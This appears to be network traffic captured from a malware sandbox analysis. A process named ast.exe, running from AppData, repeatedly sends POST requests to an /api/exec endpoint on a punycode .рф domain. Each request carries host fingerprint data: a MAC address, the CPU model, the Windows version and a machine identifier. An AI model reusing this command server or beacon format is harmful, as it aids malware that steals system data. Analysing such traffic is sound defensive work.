                                                                                                                                          2024-11-19 17:57:31 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.550052212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:32 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:32 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.550055212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:33 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:33 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.550064212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:36 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:36 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.550070212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:38 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:38 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.550073212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:39 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:39 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.550076212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:40 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:40 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.550079212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:41 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:41 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.550082212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:42 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:42 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          28192.168.2.550085212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:43 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:43 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          29192.168.2.550088212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:44 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:44 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          30192.168.2.550091212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:45 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:45 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          31192.168.2.550094212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:45 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:45 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          32192.168.2.550097212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:46 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:46 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          33192.168.2.550100212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:47 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:47 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
                                                                                                                                          2024-11-19 17:57:47 UTC403OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
